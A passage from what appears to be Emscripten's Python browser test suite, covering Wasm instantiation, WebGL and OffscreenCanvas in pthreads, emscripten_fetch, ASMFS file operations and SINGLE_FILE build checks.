var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
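<!-- {{{ SCRIPT }}} below is the placeholder that emcc replaces with the tag that loads the generated code. -->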
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread after it has first been used to render WebGL content in a pthread.
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest('webgl_sample_query.cpp', expected='0', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest('webgl_timer_query.cpp', expected='0', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature where the shell HTML page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js-only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory.
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='0',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
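// Nothing to do here; the interesting part is that the preloaded file must be decoded from the
// embedded base64 payload (without native atob/fetch) before main() runs.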
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
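<!-- Hide the browser's native atob() and fetch() so the SINGLE_FILE build has to use its own base64 fallback decoder. -->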
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
